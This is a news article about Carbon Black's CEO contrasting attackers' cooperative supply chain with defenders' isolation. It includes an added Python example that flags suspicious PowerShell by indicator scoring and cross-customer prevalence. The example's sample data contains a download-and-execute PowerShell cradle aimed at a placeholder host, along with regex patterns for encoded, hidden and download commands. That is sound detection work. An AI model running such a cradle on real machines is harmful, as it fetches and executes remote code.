Infosec defenders' supply chain is inferior to black hats, says Carbon Black CEO
Cloudy analytics as an experience aggregator to the rescue? Maybe
The security industry’s supply chain is currently inferior to that of its attackers, says Carbon Black CEO Patrick Morley, but he thinks the industry is finding ways to fight back.
In conversation with The Register yesterday, Morley advanced a theory that exploit brokers, malware authors and other bad actors work together. Security vendors, by contrast, tend to work alone.
“We don’t do as good a job, as defenders,” he said. Matters aren’t helped by miscreants increasingly using “living off the land” attacks that require no malware. Instead they find a way in through tools everyone uses – email or browsers – and then seek out software on an endpoint that can do something nasty. That’s often something with known vulnerabilities, like PDF readers, or something like PowerShell that can pull a machine’s strings.
The evil supply chain works well in such scenarios because one player will create the poisoned website, another will sell a zero-day to crack whatever’s found on an endpoint and a third will deliver and harvest the cryptocurrency-mining payload.
Happily, Morley thinks that the industry is starting to network in useful ways that make all players’ wares more effective.
One way that security vendors are fighting back is with the kind of cloudy aggregation Carbon Black already practices. The company not only monitors its users’ endpoints for odd behaviour but combines data from all its clients so that it can look for patterns that represent attacks. The CEO spoke of being able to detect legitimate and malicious use of PowerShell through such analysis of aggregated experiences.
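To make the “aggregated experiences” idea concrete, here is an added illustration (not Carbon Black’s code, and not how its analytics actually work) of how cross-customer prevalence can separate noisy-but-routine PowerShell from genuinely suspicious use. Each script-block log line is scored against a small set of well-known living-off-the-land indicators; a pattern that shows up across many tenants is treated as a shared baseline and suppressed, while a rare, high-scoring block is surfaced. The log lines, tenant names, indicator list and weights are all constructed assumptions for the example.

```python
"""Score PowerShell script-block log lines and use cross-tenant prevalence as a
benign baseline. Added illustration only; sample events are constructed."""
import re
from collections import defaultdict

# Weighted indicators of living-off-the-land PowerShell use (weights are assumptions).
INDICATORS = [
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\b\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("exec_policy_bypass", re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I), 2),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I), 2),
    ("dynamic_eval", re.compile(r"\biex\b|invoke-expression", re.I), 2),
]

# Constructed sample: (tenant_id, script-block text) as a cloud back end might receive it.
SAMPLE_EVENTS = [
    ("tenant-a", "Get-Service | Where-Object {$_.Status -eq 'Running'}"),
    # A noisy deployment script that three unrelated customers all run.
    ("tenant-a", r"powershell -nop -ep bypass -File C:\deploy\install.ps1"),
    ("tenant-b", r"powershell -nop -ep bypass -File C:\deploy\install.ps1"),
    ("tenant-c", r"powershell -nop -ep bypass -File C:\deploy\install.ps1"),
    # Rare, hidden, encoded invocation seen at a single customer (blob is a harmless placeholder).
    ("tenant-b", "powershell -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"),
    # Rare download-and-evaluate pattern seen at a single customer.
    ("tenant-c", "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"),
]


def score_event(text):
    """Return (score, [indicator names]) for one script block."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def normalize(text):
    """Collapse variable parts (URLs, long blobs, whitespace, case) so the same
    pattern from different tenants compares equal."""
    t = re.sub(r"https?://\S+", "<url>", text, flags=re.I)
    t = re.sub(r"[A-Za-z0-9+/=]{20,}", "<blob>", t)
    return re.sub(r"\s+", " ", t).strip().lower()


def tenant_prevalence(events):
    """Map each normalized script block to the number of distinct tenants that ran it."""
    seen = defaultdict(set)
    for tenant, text in events:
        seen[normalize(text)].add(tenant)
    return {key: len(tenants) for key, tenants in seen.items()}


def triage(events, min_score=3, common_threshold=3):
    """Alert on blocks that score at least min_score AND are seen in fewer than
    common_threshold tenants; widely shared patterns are treated as baseline noise."""
    prevalence = tenant_prevalence(events)
    alerts = []
    for tenant, text in events:
        score, hits = score_event(text)
        seen_in = prevalence[normalize(text)]
        if score >= min_score and seen_in < common_threshold:
            alerts.append({"tenant": tenant, "score": score, "indicators": hits,
                           "prevalence": seen_in, "text": text})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"[{alert['tenant']}] score={alert['score']} seen_in={alert['prevalence']} "
              f"indicators={alert['indicators']}\n    {alert['text']}")
```

Run as written, the deployment script scores 3 but is suppressed because all three tenants run it, while the two single-tenant blocks (scores 6 and 4) are raised. The point is the one Morley makes: a single endpoint cannot tell that a noisy command is routine, but a pool of many customers’ telemetry can.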
Another is by facilitating networking opportunities for users. Carbon Black’s conferences now include candid sharing sessions at which clients ‘fess up to their security scares. ServiceNow does something similar but in closed forums.
A third is by integrating with other security vendors. While confident in his own products’ protective powers, Morley admitted that he doesn’t have all the answers and that users will benefit from as much information as possible. That belief is why Carbon Black partners with networking and other security software vendors.
Carbon Black is also adding to its own services. The company is currently beta testing “LiveOps”, a tool Morley said performs stateful queries of endpoints and enables users to ask “almost any question I want of an endpoint”, and another called “CB Response”, a detection and response tool.
Asked by The Register if the new services suggest Carbon Black could expand into other fields that can benefit from a large pool of anonymised user data, Morley said that he sees multiple uses for the data Carbon Black collects. “The average user has 70 security products,” he said. If Carbon Black can help them to reduce that count by even five, he sees happy days ahead.
He also said that customers will buy into consolidation of the security industry, because a lot of security products were bought without a strategy. With more organisations hiring chief security officers, Morley believes buyers are now looking for platforms, not products. And he’s aiming to be the former. ®